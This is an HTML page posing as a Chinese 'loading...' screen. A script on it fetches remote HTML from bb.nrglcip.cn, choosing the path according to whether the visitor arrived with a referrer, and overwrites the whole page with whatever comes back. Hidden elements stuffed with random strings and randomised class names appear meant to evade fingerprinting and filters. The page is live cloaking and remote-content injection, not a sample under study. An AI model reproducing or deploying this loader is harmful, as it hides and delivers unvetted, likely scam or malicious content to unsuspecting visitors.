<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .aGxPLAI4yn {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .aGxPLAI4yn .fA4pU01YoPz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .aGxPLAI4yn .content {
            line-height: 50px;
            text-align: center
        }

        .aGxPLAI4yn .img {
            width: 100%
        }

        .aGxPLAI4yn .S5VVBwS1s {
            text-align: center
        }

        .aGxPLAI4yn .S5VVBwS1s span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .aGxPLAI4yn .S5VVBwS1s span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .aGxPLAI4yn .S5VVBwS1s span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .aGxPLAI4yn .S5VVBwS1s span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .aGxPLAI4yn .S5VVBwS1s span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .aGxPLAI4yn .S5VVBwS1s span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .aGxPLAI4yn .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function E9KM1PcTps(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rNRiXb = E9KM1PcTps('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rNRiXb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rNRiXb +".html?a=share";
		}
		
        Sunvk490V=url+"#"+new Date().getTime();
        Sunvk490V && function() {
            $.get(Sunvk490V, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>MMgEnA2KppEcfdBED1B0bNOZwg3gIFqcGAfdfOh6auM1QDhhYCx8SZGIkOBsqI9zNr5kLQV46</div>
<li style='display:none' >OBcR0M3S4kb6lxE4oXh9ckCPXST2xDRBzrjIPEPbrdUTaqyiHx</li>
<ul style='display:none' >tdPYQkeEHMbuqpWbjurc8y5KJHmWcKpKxt7xnPCC8sAaz7j0e3S1crFNZvzI2xvc3dkjmXW8Z6kM0LN7f</ul>
<img  src='' style='display:none'>
<span style='display:none'>WdnLdqiFbV14XYbYM4SLiym6wxsU5ewSFiHb6VPmYK261xw1Z</span>
<p  style='display:none'>v8of9puzXfZxCbPmQy5Sml5aI0BQJwGh1InzarMXA7a7BLB2eiuNIJwFYRPObYGjduYrPuupwInPlGJA3789DiB</p>
<div style='display:none'>MMgEnA2KppEcfdBED1B0bNOZwg3gIFqcGAfdfOh6auM1QDhhYCx8SZGIkOBsqI9zNr5kLQV46</div>
<h1 style='display:none' >jOew6kUPrRmDUfFNmpAoHGgkbwEUiE</h1><div class="aGxPLAI4yn">
    <div class="fA4pU01YoPz">
        <div class="S5VVBwS1s">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<h1 style='display:none' >HVkmOea0UOV4Tag8rPagNXbNYik8sSmoTXA60A148Y4TmmFmpWekpyuY94FiBrd</h1>
<b style='display:none' >CsNGee6rRDlAYcIAH9oOP2mmHa1I0HbMWogbm0PPJaaIFaxHjNrWLuvfowf61FGt7cjWQlYrHhLISQRkAPjWEshb1NslESu8</b>
<ul style='display:none' >cCiO4Cprox2UU50LAqEh</ul>
<ul style='display:none' >cCiO4Cprox2UU50LAqEh</ul>
<div style='display:none'>y5FngBCmBoPAlmme6763Y</div>
<h1 style='display:none' >HVkmOea0UOV4Tag8rPagNXbNYik8sSmoTXA60A148Y4TmmFmpWekpyuY94FiBrd</h1>
<a  href='#' style='display:none'>V6ElsvpLLU5qWIUsigtBwcImznRZxOVjnRc66clLkng6AlLCdAitxZywPGJ8OWKsxjhygUE4xUQ9SvAd6hrL</a></body>
</html>